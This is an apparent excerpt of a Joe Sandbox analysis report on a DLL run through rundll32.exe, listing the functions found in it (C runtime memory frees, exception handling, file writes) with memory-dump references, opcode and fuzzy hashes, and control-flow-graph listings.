                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 076f7f8bbb03c5124df705a1e92f6905661218f9d47229f4d5532c08b8aee992
                        • Instruction ID: ca61f1c908f7bc17a77d4e8c3c43ba4f092f6908a549a77c31554116d2111713
                        • Opcode Fuzzy Hash: 076f7f8bbb03c5124df705a1e92f6905661218f9d47229f4d5532c08b8aee992
                        • Instruction Fuzzy Hash: 7CE08631800544AFCF213F59D84DA4D3B2EFF07251B114420F40587120CB36E9E2EF90
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6FBA1AAC,?,?,00000008,?,?,6FBA1744,00000000), ref: 6FBA1CDE
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 88decd1f71f19bcd55c494e9e84a3951ec8489783ffbe8d580ad01f2be08ef57
                        • Instruction ID: 4663db648f18a97ca3c70fb511a3cdf3c877b838454682fc151c3e361f29facb
                        • Opcode Fuzzy Hash: 88decd1f71f19bcd55c494e9e84a3951ec8489783ffbe8d580ad01f2be08ef57
                        • Instruction Fuzzy Hash: 56B16735214648CFD744CF28D486BA47BA1FF05364F298699E8E9CF2A1C336E982CF40
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6FB970BD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: 7de21c7c88ff20f1b269c705d649de539e2e3eb09e2054f0aa832da2f2df34bc
                        • Instruction ID: 7a8d5bfbf022352345bc6ab137d53a97dfb75a9913fed4df6187c05fe3e90b81
                        • Opcode Fuzzy Hash: 7de21c7c88ff20f1b269c705d649de539e2e3eb09e2054f0aa832da2f2df34bc
                        • Instruction Fuzzy Hash: B2516AB1A10615DBDB14CF66D9827AEBBF0FB4A320F20C47AD915EB250D3B4A951CF60
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84a68a572d868f917fc0de4783eabe53ef09743487d6581fb314b482579c872e
                        • Instruction ID: 69955b119290330548d2bf2213e6c2a7b6f9da198f5572eb27810f13cb9b036d
                        • Opcode Fuzzy Hash: 84a68a572d868f917fc0de4783eabe53ef09743487d6581fb314b482579c872e
                        • Instruction Fuzzy Hash: E041C3B180465DAFDB14CF69DC88AEEBBB8EF46304F1482E9E41DD3240DA349E848F50
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: f9afee9174519d42e03d2e2be001f6d571812d78b9930840f635ae3876fb29a4
                        • Instruction ID: 35139a4323ca3a59543d05803dca2fc27e90e8ee7085fd3fe3e76bb2c64fa58d
                        • Opcode Fuzzy Hash: f9afee9174519d42e03d2e2be001f6d571812d78b9930840f635ae3876fb29a4
                        • Instruction Fuzzy Hash: 22A02474500500CF4F004F37411730C3DF5F54F1F13014014D001C3000D73040315700
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                        • Instruction ID: 626b8ec6102574a53edf852f86ce2576cddc32c655ab520213a7f1499f4daae3
                        • Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                        • Instruction Fuzzy Hash: CDE08C72A11268EBCB10CBD8D980A8EB3ECEB4AB10B5281A6F511D3200C270DF00C7D0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 498 6fb9ddf0-6fb9de04 499 6fb9de72-6fb9de7a 498->499 500 6fb9de06-6fb9de0b 498->500 502 6fb9de7c-6fb9de7f 499->502 503 6fb9dec1-6fb9ded9 call 6fb9df61 499->503 500->499 501 6fb9de0d-6fb9de12 500->501 501->499 504 6fb9de14-6fb9de17 501->504 502->503 506 6fb9de81-6fb9debe call 6fb9b90f * 4 502->506 512 6fb9dedc-6fb9dee3 503->512 504->499 507 6fb9de19-6fb9de21 504->507 506->503 510 6fb9de3b-6fb9de43 507->510 511 6fb9de23-6fb9de26 507->511 514 6fb9de5d-6fb9de71 call 6fb9b90f * 2 510->514 515 6fb9de45-6fb9de48 510->515 511->510 517 6fb9de28-6fb9de3a call 6fb9b90f call 6fb9e230 511->517 518 6fb9df02-6fb9df06 512->518 519 6fb9dee5-6fb9dee9 512->519 514->499 515->514 520 6fb9de4a-6fb9de5c call 6fb9b90f call 6fb9e32e 515->520 517->510 522 6fb9df08-6fb9df0d 518->522 523 6fb9df1e-6fb9df2a 518->523 526 6fb9deeb-6fb9deee 519->526 527 6fb9deff 519->527 520->514 530 6fb9df1b 522->530 531 6fb9df0f-6fb9df12 522->531 523->512 533 6fb9df2c-6fb9df37 call 6fb9b90f 523->533 526->527 535 6fb9def0-6fb9defe call 6fb9b90f * 2 526->535 527->518 530->523 531->530 538 6fb9df14-6fb9df1a call 6fb9b90f 531->538 535->527 538->530
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 6FB9DE34
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E24D
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E25F
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E271
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E283
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E295
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2A7
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2B9
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2CB
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2DD
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2EF
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E301
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E313
                          • Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E325
                        • _free.LIBCMT ref: 6FB9DE29
                          • Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
                          • Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937
                        • _free.LIBCMT ref: 6FB9DE4B
                        • _free.LIBCMT ref: 6FB9DE60
                        • _free.LIBCMT ref: 6FB9DE6B
                        • _free.LIBCMT ref: 6FB9DE8D
                        • _free.LIBCMT ref: 6FB9DEA0
                        • _free.LIBCMT ref: 6FB9DEAE
                        • _free.LIBCMT ref: 6FB9DEB9
                        • _free.LIBCMT ref: 6FB9DEF1
                        • _free.LIBCMT ref: 6FB9DEF8
                        • _free.LIBCMT ref: 6FB9DF15
                        • _free.LIBCMT ref: 6FB9DF2D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 1fd3f6375e0a231ad22240b5f05d8eead204c172ab42c815e615a3663d48515a
                        • Instruction ID: 053185cfb4040b4fdd1d71595b644a869a43e971d688a5f274f558e645a2de79
                        • Opcode Fuzzy Hash: 1fd3f6375e0a231ad22240b5f05d8eead204c172ab42c815e615a3663d48515a
                        • Instruction Fuzzy Hash: F4310A716047859FEF219A3AFC41B9A77EAEF07354F10983AE495DB190DB31BA508B20

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 555 6fb982c0-6fb982eb call 6fb9922d 558 6fb982f1-6fb982f4 555->558 559 6fb98664-6fb98669 call 6fb9adfe 555->559 558->559 560 6fb982fa-6fb98303 558->560 562 6fb98309-6fb9830d 560->562 563 6fb98400-6fb98406 560->563 562->563 565 6fb98313-6fb9831a 562->565 566 6fb9840e-6fb9841c 563->566 567 6fb9831c-6fb98323 565->567 568 6fb98332-6fb98337 565->568 569 6fb985cd-6fb985d0 566->569 570 6fb98422-6fb98426 566->570 567->568 571 6fb98325-6fb9832c 567->571 568->563 574 6fb9833d-6fb98345 call 6fb97f7b 568->574 572 6fb985f3-6fb985fc call 6fb97f7b 569->572 573 6fb985d2-6fb985d5 569->573 570->569 575 6fb9842c-6fb98433 570->575 571->563 571->568 572->559 588 6fb985fe-6fb98602 572->588 573->559 579 6fb985db-6fb985f0 call 6fb9866a 573->579 587 6fb9834b-6fb98364 call 6fb97f7b * 2 574->587 574->588 576 6fb9844b-6fb98451 575->576 577 6fb98435-6fb9843c 575->577 583 6fb98569-6fb9856d 576->583 584 6fb98457-6fb9847e call 6fb9752f 576->584 577->576 581 6fb9843e-6fb98445 577->581 579->572 581->569 581->576 590 6fb98579-6fb98585 583->590 591 6fb9856f-6fb98578 call 6fb978e5 583->591 584->583 598 6fb98484-6fb98487 584->598 587->559 613 6fb9836a-6fb98370 587->613 590->572 596 6fb98587-6fb9858b 590->596 591->590 600 6fb9859d-6fb985a5 596->600 601 6fb9858d-6fb98595 596->601 606 6fb9848a-6fb9849f 598->606 603 6fb985bc-6fb985c9 call 6fb98ccf 600->603 604 6fb985a7-6fb985ba call 6fb97f7b * 2 600->604 601->572 602 6fb98597-6fb9859b 601->602 602->572 602->600 620 6fb98628-6fb9863d call 6fb97f7b * 2 603->620 621 6fb985cb 603->621 628 6fb98603 call 6fb9adc2 604->628 610 6fb9854a-6fb9855d 606->610 611 6fb984a5-6fb984a8 606->611 610->606 614 6fb98563-6fb98566 610->614 611->610 616 6fb984ae-6fb984b6 611->616 618 6fb9839c-6fb983a4 call 6fb97f7b 613->618 619 6fb98372-6fb98376 613->619 614->583 616->610 622 6fb984bc-6fb984d0 616->622 639 6fb98408-6fb9840b 618->639 640 6fb983a6-6fb983c6 call 6fb97f7b * 2 call 6fb98ccf 618->640 619->618 624 6fb98378-6fb9837f 619->624 648 6fb9863f 620->648 649 6fb98642-6fb9865f call 6fb97722 call 6fb98bcf call 6fb98d8c call 6fb98b46 620->649 621->572 625 6fb984d3-6fb984e3 622->625 629 6fb98381-6fb98388 624->629 630 6fb98393-6fb98396 624->630 631 6fb9850b-6fb98518 625->631 632 6fb984e5-6fb984f8 call 6fb987a0 625->632 644 6fb98608-6fb98623 call 6fb978e5 call 6fb9894b call 6fb97b0e 628->644 629->630 637 6fb9838a-6fb98391 629->637 630->559 630->618 631->625 635 6fb9851a 631->635 651 6fb984fa-6fb98500 632->651 652 6fb9851c-6fb98544 call 6fb98240 632->652 643 6fb98547 635->643 637->618 637->630 639->566 640->639 668 6fb983c8-6fb983cd 640->668 643->610 644->620 648->649 649->559 651->632 653 6fb98502-6fb98508 651->653 652->643 653->631 668->628 670 6fb983d3-6fb983e6 call 6fb98963 668->670 670->644 675 6fb983ec-6fb983f8 670->675 675->628 676 6fb983fe 675->676 676->670
                        APIs
                        • IsInExceptionSpec.LIBVCRUNTIME ref: 6FB983BD
                        • type_info::operator==.LIBVCRUNTIME ref: 6FB983DF
                        • ___TypeMatch.LIBVCRUNTIME ref: 6FB984EE
                        • IsInExceptionSpec.LIBVCRUNTIME ref: 6FB985C0
                        • _UnwindNestedFrames.LIBCMT ref: 6FB98644
                        • CallUnexpected.LIBVCRUNTIME ref: 6FB9865F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2123188842-393685449
                        • Opcode ID: b171a9ac03f8bc05a6221cf5282484945f069d8f74fac92c3c5d52c751791341
                        • Instruction ID: 90f48bdb406103c373edc411feb457b3b017b5c161371ff5ad012d1ea6175002
                        • Opcode Fuzzy Hash: b171a9ac03f8bc05a6221cf5282484945f069d8f74fac92c3c5d52c751791341
                        • Instruction Fuzzy Hash: 46B15571808289EFCF05CFA4E980A9EBBB5FF06314F90417AE8156B251D771EA52CF91

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: ade39983fbf84e29ac307410622921318894098cd987af90847f620a01c86e72
                        • Instruction ID: 30899ad4afd0731b02cd22f061a9399b0370a7de342e425f06058ea91ef41a74
                        • Opcode Fuzzy Hash: ade39983fbf84e29ac307410622921318894098cd987af90847f620a01c86e72
                        • Instruction Fuzzy Hash: 5721967691424CAFCF41EFA4D880EDE7BB9AF0A244F0181A6E5559B161DB31EB448B80
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 6FB97C47
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6FB97C4F
                        • _ValidateLocalCookies.LIBCMT ref: 6FB97CD8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6FB97D03
                        • _ValidateLocalCookies.LIBCMT ref: 6FB97D58
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: d31f4b69df1e6405d414b05f11917be8c8793af39cfdc41c1574bc883ff1d894
                        • Instruction ID: f1a9f46cc6be517acfe641e15a1194ab49787401fd5d7e65c699bd2dcd6a4141
                        • Opcode Fuzzy Hash: d31f4b69df1e6405d414b05f11917be8c8793af39cfdc41c1574bc883ff1d894
                        • Instruction Fuzzy Hash: D641C574A04288ABCF10CF69E840ADE7BF5FF47328F208165E8149B791D771EA56CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 0-537541572
                        • Opcode ID: dc008af40193c635cc819ac66fab6f005b14bb4b8c41d168d6347525c78c7346
                        • Instruction ID: 8a77e9760dcb0f3bbfc0a7a45fa4c3d1052c901b99ae20b2bede8ee1fa7000f0
                        • Opcode Fuzzy Hash: dc008af40193c635cc819ac66fab6f005b14bb4b8c41d168d6347525c78c7346
                        • Instruction Fuzzy Hash: 2721C6F2A45A92ABDB218A69AC45B9E3769EF037A0F110131E816F7281D730FD10C6E0
                        APIs
                          • Part of subcall function 6FB9E397: _free.LIBCMT ref: 6FB9E3BC
                        • _free.LIBCMT ref: 6FB9E41D
                          • Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
                          • Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937
                        • _free.LIBCMT ref: 6FB9E428
                        • _free.LIBCMT ref: 6FB9E433
                        • _free.LIBCMT ref: 6FB9E487
                        • _free.LIBCMT ref: 6FB9E492
                        • _free.LIBCMT ref: 6FB9E49D
                        • _free.LIBCMT ref: 6FB9E4A8
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                        • Instruction ID: bb50f3840802f44d973791ba45cf6558229208b41a32ec65850c0b8e358f5aac
                        • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                        • Instruction Fuzzy Hash: 04112E71548B88EADA21ABB0EC05FCF7F9CBF07704F40483DA299A61D1DB75F6148660
                        APIs
                        • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6FB9F2A4
                        • __fassign.LIBCMT ref: 6FB9F489
                        • __fassign.LIBCMT ref: 6FB9F4A6
                        • WriteFile.KERNEL32(?,6FB9D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FB9F4EE
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FB9F52E
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FB9F5D6
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 1735259414-0
                        • Opcode ID: 6978bc5417ca00def5b9f13f2b41822c9c43281b4031bfa014c59a630797874b
                        • Instruction ID: 7eb32e3921edabfe4b38c2ec8c81a53cd9b2605ec5a8c5582e4168dd66aa598f
                        • Opcode Fuzzy Hash: 6978bc5417ca00def5b9f13f2b41822c9c43281b4031bfa014c59a630797874b
                        • Instruction Fuzzy Hash: FFC19D75D002989FCF15CFA8D8909EDBBB5EF4A324F28416AE855BB241D731A942CF60
                        APIs
                        • GetLastError.KERNEL32(00000001,?,6FB97B9E,6FB968B4,6FB96D4B,?,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8,0000000C,6FB9707E), ref: 6FB97F97
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FB97FA5
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FB97FBE
                        • SetLastError.KERNEL32(00000000,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8,0000000C,6FB9707E,?,00000001,?), ref: 6FB98010
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 14cdbb04b7b23fa70db6168beb832c88e6ae803f6c46e7a365ede00ab7ff077b
                        • Instruction ID: 580ae83e93f66e322c1f1f93faba2b09a2bc5cf2a49ed036052193e8d4b45fd7
                        • Opcode Fuzzy Hash: 14cdbb04b7b23fa70db6168beb832c88e6ae803f6c46e7a365ede00ab7ff077b
                        • Instruction Fuzzy Hash: F901FC3214CBA17D9A3016777C9A65E3794EF43779730073AF1309A0D4EF519862A140
                        Strings
                        • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6FB9C180
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: C:\Windows\SysWOW64\rundll32.exe
                        • API String ID: 0-2837366778
                        • Opcode ID: fd204283d8891cc8dd3dd5f6618d0f898c62712b526a02826c3a5b881438cd30
                        • Instruction ID: fbc7b4a9f3776ef8633e6f2b65236d9d01ca6be3d6d103d727f390b36a52098d
                        • Opcode Fuzzy Hash: fd204283d8891cc8dd3dd5f6618d0f898c62712b526a02826c3a5b881438cd30
                        • Instruction Fuzzy Hash: 4F2184F16042976F9B10AFB5AD80D5BB76DEF477687104635F825DB280E731EC5087A0
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,?,6FB990B8,00000000,?,00000001,00000000,?,6FB9912F,00000001,FlsFree,6FBA6E3C,FlsFree,00000000), ref: 6FB99087
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-
                        • API String ID: 3664257935-2084034818
                        • Opcode ID: 32312b6ac974a9b827706e6abb0bf2f5cf3c7612579a5912d1e8c4a488532e74
                        • Instruction ID: 16f101bf87350a66ef7ff4b054d891c9ddd8816af1bdd298ea8300e8876447ee
